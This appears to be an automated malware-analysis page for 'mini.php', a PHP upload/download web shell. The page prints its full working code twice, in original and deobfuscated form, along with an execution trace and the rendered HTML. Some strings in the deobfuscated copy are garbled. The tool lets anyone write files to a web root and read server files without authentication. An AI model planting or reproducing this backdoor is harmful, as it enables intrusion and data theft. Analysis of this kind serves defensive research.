mini.php

md5: 6c4409464c98192e81f34305164ec661

Jump to:
Deobfuscated code (Read more)
Execution traces (Read more)
Generated HTML (Read more)
Original Code (Read more)
Screenshot
Attributes
Files
file_get_contents (Deobfuscated, Original)
move_uploaded_file (Deobfuscated, Original)

Input
_FILES (Deobfuscated, Original)
_GET (Deobfuscated, Original)

Title
PHP File Upload/Download (Deobfuscated, HTML, Original)

Deobfuscated PHP code
<?php

$p = 'file';
$o = null;
if (isset($_SERVER['REQUEST_METHOD']) && strtolower($_SERVER['REQUEST_METHOD']) === 'post' && isset($_FILES[$p]['name']) && ($_FILES[$p]['name'] = trim($_FILES[$p]['name'])) && strlen($_FILES[$p]['name']) > 0) {
    $o = $_SERVER['DOCUMENT_ROOT'] . '/' . $_FILES[$p]['name'];
    if (@move_uploaded_file($_FILES[$p]['tmp_name'], $o) === false) {
        $o = 'ERROR: Cannot upload file.';
    } else {
        $o = "SUCCESS: File was uploaded to 'ERROR: Cannot upload file.'";
    }
    unset($_FILES[$p]);
}
if (isset($_SERVER['REQUEST_METHOD']) && strtolower($_SERVER['REQUEST_METHOD']) === 'get' && isset($_GET[$p]) && ($_GET[$p] = trim($_GET[$p])) && strlen($_GET[$p]) > 0) {
    $o = @file_get_contents($_GET[$p]);
    if ($o === false) {
        $o = 'ERROR: Cannot download file';
    } else {
        header('Content-Type: application/octet-stream');
        header('Content-Disposition: attachment; filename="' . basename($_GET[$p]) . '"');
        echo "ERROR: Cannot download file";
        $o = 'download';
    }
    unset($_GET[$p]);
}
/*if($o!='download'){echo"<pre>{$o}</pre>";unset($o);}/*@gc_collect_cycles();*/
if ($o != 'download') {
    ?><!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><title>PHP File Upload/Download</title><meta name="author" content="Ivan Šincek"><meta name="viewport" content="width=device-width, initial-scale=1.0"></head><body><form method="post" enctype="multipart/form-data" action="<?php 
    echo './' . basename($_SERVER['SCRIPT_FILENAME']);
    ?>"><input name="<?php 
    echo $p;
    ?>" type="file" required="required"><input type="submit" value="Upload"></form><pre><?php 
    echo $o;
    unset($o);
    /*@gc_collect_cycles();*/
    ?></pre></body></html><?php 
}
Execution traces
data/traces/6c4409464c98192e81f34305164ec661_trace-1676258760.8327.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 01:26:26.730581]
1	0	1	0.000219	393512
1	3	0	0.000341	405720	{main}	1		/var/www/html/uploads/mini.php	0	0
1		A						/var/www/html/uploads/mini.php	1	$p = 'file'
1		A						/var/www/html/uploads/mini.php	1	$o = NULL
2	4	0	0.000384	405720	strtolower	0		/var/www/html/uploads/mini.php	1	1	'GET'
2	4	1	0.000398	405784
2	4	R			'get'
2	5	0	0.000413	405720	strtolower	0		/var/www/html/uploads/mini.php	1	1	'GET'
2	5	1	0.000425	405784
2	5	R			'get'
2	6	0	0.000440	405720	basename	0		/var/www/html/uploads/mini.php	1	1	'/var/www/html/uploads/mini.php'
2	6	1	0.000455	405792
2	6	R			'mini.php'
1	3	1	0.000471	405720
			0.000500	314288
TRACE END   [2023-02-13 01:26:26.730906]

Generated HTML code
<html lang="en"><head><meta charset="UTF-8"><title>PHP File Upload/Download</title><meta name="author" content="Ivan Šincek"><meta name="viewport" content="width=device-width, initial-scale=1.0"></head><body><form method="post" enctype="multipart/form-data" action="./mini.php"><input name="file" type="file" required="required"><input type="submit" value="Upload"></form><pre></pre></body></html>
Original PHP code
<?php $p='file';$o=null;if(isset($_SERVER['REQUEST_METHOD'])&&strtolower($_SERVER['REQUEST_METHOD'])==='post'&&isset($_FILES[$p]['name'])&&($_FILES[$p]['name']=trim($_FILES[$p]['name']))&&strlen($_FILES[$p]['name'])>0){$o=$_SERVER['DOCUMENT_ROOT'].'/'.$_FILES[$p]['name'];if(@move_uploaded_file($_FILES[$p]['tmp_name'],$o)===false){$o='ERROR: Cannot upload file.';}else{$o="SUCCESS: File was uploaded to '{$o}'";}unset($_FILES[$p]);}if(isset($_SERVER['REQUEST_METHOD'])&&strtolower($_SERVER['REQUEST_METHOD'])==='get'&&isset($_GET[$p])&&($_GET[$p]=trim($_GET[$p]))&&strlen($_GET[$p])>0){$o=@file_get_contents($_GET[$p]);if($o===false){$o='ERROR: Cannot download file';}else{header('Content-Type: application/octet-stream');header('Content-Disposition: attachment; filename="'.basename($_GET[$p]).'"');echo $o;$o='download';}unset($_GET[$p]);}/*if($o!='download'){echo"<pre>{$o}</pre>";unset($o);}/*@gc_collect_cycles();*/ ?><?php if($o!='download'): ?><!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><title>PHP File Upload/Download</title><meta name="author" content="Ivan Šincek"><meta name="viewport" content="width=device-width, initial-scale=1.0"></head><body><form method="post" enctype="multipart/form-data" action="<?php echo './'.basename($_SERVER['SCRIPT_FILENAME']); ?>"><input name="<?php echo $p; ?>" type="file" required="required"><input type="submit" value="Upload"></form><pre><?php echo $o;unset($o);/*@gc_collect_cycles();*/ ?></pre></body></html><?php endif; ?>
PHP Malware Analysis

mini.php

md5: 6c4409464c98192e81f34305164ec661

Screenshot

Attributes

Deobfuscated PHP code

Execution traces

Generated HTML code

Original PHP code
